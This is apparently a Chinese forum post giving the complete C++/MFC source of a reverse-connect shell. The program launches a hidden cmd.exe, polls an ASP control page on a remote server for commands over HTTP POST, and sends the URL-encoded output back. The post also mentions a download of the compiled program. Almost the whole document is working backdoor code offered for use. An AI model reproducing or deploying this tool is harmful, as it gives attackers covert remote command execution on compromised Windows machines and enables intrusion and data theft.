[推荐]用ASP实现反向连接控制
用ASP实现反向连接控制
// shell.cpp : Defines the entry point for the console application.
//
// 实现功能: 与ASP控制端实现交互,实现反向连接
// Function: polls an ASP control page over plain HTTP POST for commands, feeds them to a hidden
// local cmd.exe through pipes, and posts the URL-encoded output back (a reverse-connect shell).
//
#include "stdafx.h"
#include "shell.h"
#include "afxinet.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
#define BUFFER_SIZE 1024 // 读缓冲区大小
/////////////////////////////////////////////////////////////////////////////
// The one and only application object
CWinApp theApp;
using namespace std;
CString URLEncode(const char* s); // URL-encodes a NUL-terminated byte string for use as a form value
BOOL PostRequest(const char *szFormData, char *szResult); // POSTs szFormData to szServer/szPath; last reply line copied to szResult (may be NULL)
void DoShell(); // runs the command loop between the control page and a hidden cmd.exe
char szServer[50], szPath[50]; // shared connection target, filled from argv in _tmain; 50 bytes each including the NUL
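// Program entry point.
//   argv[1] - control server host name (copied into szServer)
//   argv[2] - path of the ASP control page on that host (copied into szPath)
// Returns 0 on a normal run, -1 on a usage error, 1 when MFC cannot be initialised
// or the initial login POST fails.
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
	int nRetCode = 0;
	// initialize MFC and print an error on failure
	if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
	{
		// Nothing below works without MFC (CInternetSession, CString), so stop
		// here instead of carrying on with a half-initialised runtime.
		cerr << _T("Fatal Error: MFC initialization failed") << endl;
		return 1;
	}
	printf("ASP Console Client By CoolDiyer\n");
	if (argc != 3)
	{
		printf("Usage:\n\trshell <Server> <Path>\nExp.\n\trshell www.abc.com /x.asp\n");
		return -1;
	}
	// argv is attacker-controllable input to this process: bound the copies to the
	// 50-byte globals rather than strcpy'ing blindly, which overflowed the stack
	// buffers for any host or path of 50+ characters.
	if (strlen(argv[1]) >= sizeof(szServer) || strlen(argv[2]) >= sizeof(szPath))
	{
		printf("Error: <Server> and <Path> must each be shorter than %u characters\n",
		       (unsigned)sizeof(szServer));
		return -1;
	}
	memset(szServer, 0, sizeof(szServer));
	memset(szPath, 0, sizeof(szPath));
	strncpy(szServer, argv[1], sizeof(szServer) - 1);
	strncpy(szPath, argv[2], sizeof(szPath) - 1);

	// PostRequest copies at most BUFFER_SIZE-1 bytes plus a NUL into this buffer.
	char szResult[BUFFER_SIZE] = { 0 };
	if (!PostRequest("act=login", szResult)) // login
	{
		printf("Error: could not reach the control page to log in\n");
		return 1;
	}
	DoShell(); // run the command loop against cmd.exe
	PostRequest("act=exit", szResult); // log out; best effort, result ignored
	return nRetCode;
}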
//
// URL编码函数,返回一个CString变量
//
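//
// URL-encodes a NUL-terminated byte string and returns it as a CString.
//   s - input bytes; NULL is treated as the empty string.
// Letters, digits, '.', '-' and '_' pass through unchanged, a space becomes '+',
// every other byte becomes "%XX" with upper-case hex (same output as the
// original sprintf-based version, without its heap-allocated scratch buffer).
//
CString URLEncode(const char* s)
{
	CString encoded = "";
	if (s == NULL)
		return encoded; // the original crashed in strlen on a NULL input

	static const char hexDigits[] = "0123456789ABCDEF";
	// iterate as unsigned so bytes >= 0x80 encode as %80..%FF, not as negative values
	for (const unsigned char* p = (const unsigned char*)s; *p != '\0'; ++p)
	{
		const unsigned char c = *p;
		const bool unreserved =
			(c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
			(c >= '0' && c <= '9') || c == '.' || c == '-' || c == '_';
		if (unreserved)
		{
			encoded += (char)c;
		}
		else if (c == ' ')
		{
			encoded += '+';
		}
		else
		{
			encoded += '%';
			encoded += hexDigits[c >> 4];
			encoded += hexDigits[c & 0x0F];
		}
	}
	return encoded;
}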
//
// 表单发送函数,核心例程,返回接收到的内容,也就是要执行的命令
//
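//
// Core transport routine: POSTs a form body to the control page and hands back
// the LAST line of the reply, which is the command the controller wants run.
//   szFormData - complete "application/x-www-form-urlencoded" body, NUL-terminated
//   szResult   - optional output buffer; callers pass BUFFER_SIZE-byte buffers, so
//                at most BUFFER_SIZE-1 bytes plus a NUL are written. NULL discards
//                the reply. On failure it is left as an empty string.
// Returns TRUE when one of the attempts (initial try + 3 retries, as before)
// sent the request successfully, FALSE otherwise.
//
// NOTE(review): this is plain HTTP with no authentication of the server beyond
// its host name; anyone who can answer for szServer gets to run commands.
//
BOOL PostRequest(const char *szFormData, char *szResult)
{
	if (szFormData == NULL)
		return FALSE;
	if (szResult != NULL)
		szResult[0] = '\0';

	// Send exactly the body bytes. The original passed strlen()+1 and so put the
	// terminating NUL on the wire as part of the form data.
	const DWORD dwBodyLen = (DWORD)strlen(szFormData);
	BOOL bSent = FALSE;

	// Plain retry loop; the original retried with a goto from the catch handler
	// back into the try block, which C++ does not allow.
	for (unsigned int uAttempt = 0; uAttempt < 4 && !bSent; ++uAttempt)
	{
		CHttpConnection *pConnection = NULL;
		CHttpFile *pFile = NULL;
		try
		{
			CInternetSession session;
			pConnection = session.GetHttpConnection(szServer);
			pFile = pConnection->OpenRequest(CHttpConnection::HTTP_VERB_POST, szPath);
			// the server only parses the body as a form with this header present
			pFile->AddRequestHeaders("Content-Type: application/x-www-form-urlencoded");
			if (pFile->SendRequest(NULL, 0, (LPVOID)szFormData, dwBodyLen))
			{
				CString szData;
				while (pFile->ReadString(szData))
				{
					// ReadString returns a line of arbitrary length from an
					// untrusted server; the original strcpy'd it unbounded into
					// the caller's 1024-byte buffer.
					if (szResult != NULL)
					{
						strncpy(szResult, (LPCTSTR)szData, BUFFER_SIZE - 1);
						szResult[BUFFER_SIZE - 1] = '\0';
					}
				}
				bSent = TRUE;
			}
			pFile->Close();
			session.Close();
		}
		catch (CInternetException *pEx)
		{
			pEx->Delete(); // MFC exceptions are heap objects and must be released
		}
		catch (...)
		{
			// any other failure: fall through to the next attempt
		}
		// Both objects are heap-allocated by MFC and were never freed before.
		delete pFile;
		delete pConnection;
	}
	return bSent;
}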
//
// 让cmd.exe与ASP控制端进行交互的核心例程
//
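//
// Command loop: starts a hidden cmd.exe with its stdin/stdout/stderr on pipes,
// then alternates between forwarding cmd.exe output to the control page
// ("result=<urlencoded>") and fetching the next command ("get=yes"). Exits when
// the controller sends "exit", when cmd.exe goes away, or on a pipe error.
// Uses the globals szServer/szPath through PostRequest.
//
void DoShell()
{
	SECURITY_ATTRIBUTES sa;
	sa.nLength = sizeof(sa);
	sa.lpSecurityDescriptor = NULL;
	sa.bInheritHandle = TRUE; // cmd.exe must inherit the ends it uses as std handles

	HANDLE hReadPipe1 = NULL, hWritePipe1 = NULL; // cmd.exe stdout/stderr -> us
	HANDLE hReadPipe2 = NULL, hWritePipe2 = NULL; // us -> cmd.exe stdin
	if (!CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0))
	{
		printf("CreatePipe failed: %lu\n", GetLastError());
		return;
	}
	if (!CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0))
	{
		printf("CreatePipe failed: %lu\n", GetLastError());
		CloseHandle(hReadPipe1);
		CloseHandle(hWritePipe1);
		return;
	}
	// Our own ends must not leak into the child, otherwise it holds a copy of
	// the write end of its own stdin and of the read end of its stdout.
	SetHandleInformation(hReadPipe1, HANDLE_FLAG_INHERIT, 0);
	SetHandleInformation(hWritePipe2, HANDLE_FLAG_INHERIT, 0);

	STARTUPINFO si;
	ZeroMemory(&si, sizeof(si));
	GetStartupInfo(&si);
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = hReadPipe2;
	si.hStdOutput = si.hStdError = hWritePipe1;

	PROCESS_INFORMATION processInfo;
	ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));
	char cmdLine[] = "cmd.exe"; // writable: CreateProcess may modify lpCommandLine
	// The original never checked this and then spun forever on dead pipes and
	// called TerminateProcess on a NULL handle.
	if (!CreateProcess(NULL, cmdLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &processInfo))
	{
		printf("CreateProcess failed: %lu\n", GetLastError());
		CloseHandle(hReadPipe1);
		CloseHandle(hReadPipe2);
		CloseHandle(hWritePipe1);
		CloseHandle(hWritePipe2);
		return;
	}
	// The child now owns its std handles; dropping our copies lets PeekNamedPipe
	// report a broken pipe once cmd.exe exits instead of looping forever.
	CloseHandle(hReadPipe2);
	CloseHandle(hWritePipe1);
	hReadPipe2 = hWritePipe1 = NULL;

	char buff[BUFFER_SIZE] = { 0 };
	// Worst case URL encoding triples every byte of buff. The original sized this
	// at BUFFER_SIZE*3 and forgot the 7-byte "result=" prefix and the NUL, so a
	// full buffer of non-alphanumeric output overflowed it.
	char szTmp[7 + (BUFFER_SIZE - 1) * 3 + 1];
	DWORD bytesAvail = 0;
	DWORD bytesRead = 0;

	while (TRUE)
	{
		memset(buff, 0, BUFFER_SIZE);
		bytesAvail = 0;
		BOOL bPeek = PeekNamedPipe(hReadPipe1, NULL, 0, NULL, &bytesAvail, NULL);
		// give cmd.exe up to ~500 ms to produce output before asking for a command
		for (int i = 0; i < 5 && bPeek && bytesAvail == 0; i++)
		{
			Sleep(100);
			bPeek = PeekNamedPipe(hReadPipe1, NULL, 0, NULL, &bytesAvail, NULL);
		}
		if (!bPeek)
			break; // broken pipe: cmd.exe has exited

		if (bytesAvail > 0)
		{
			// leave room for the NUL that the string functions below rely on
			const DWORD toRead = bytesAvail < BUFFER_SIZE - 1 ? bytesAvail : BUFFER_SIZE - 1;
			if (!ReadFile(hReadPipe1, buff, toRead, &bytesRead, NULL))
				break;
			buff[bytesRead] = '\0';

			const CString encoded = URLEncode(buff);
			memset(szTmp, 0, sizeof(szTmp));
			strcpy(szTmp, "result=");
			strncat(szTmp, (LPCTSTR)encoded, sizeof(szTmp) - strlen(szTmp) - 1);
			printf("%s", szTmp);
			PostRequest(szTmp, NULL); // ship the command output to the controller
			printf("Post command result ok\n");
		}
		else
		{
			// no output pending: poll the control page for the next command
			do
			{
				buff[0] = '\0';
				PostRequest("get=yes", buff);
				printf("get command\n");
				::Sleep(1000); // one-second poll interval
			}
			while (strlen(buff) == 0);
			printf("%s\n", buff);

			// "exit" is consumed here and ends the session
			if (strcmp(buff, "exit") == 0) break;
			printf("execute command %s\n", buff);
			// Write the newline separately: buff can already hold BUFFER_SIZE-1
			// characters, so the original strcat(buff, "\n") could overflow it.
			DWORD written = 0;
			if (!WriteFile(hWritePipe2, buff, (DWORD)strlen(buff), &written, NULL) ||
			    !WriteFile(hWritePipe2, "\n", 1, &written, NULL))
				break; // stdin pipe gone: cmd.exe has exited
		}
	}

	TerminateProcess(processInfo.hProcess, 0);
	// process/thread handles were leaked by the original
	CloseHandle(processInfo.hThread);
	CloseHandle(processInfo.hProcess);
	CloseHandle(hReadPipe1);
	CloseHandle(hWritePipe2);
}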
备注:
以上代码可能因过滤而显示错误,请下载压缩包(含全部源代码和编译好的程序):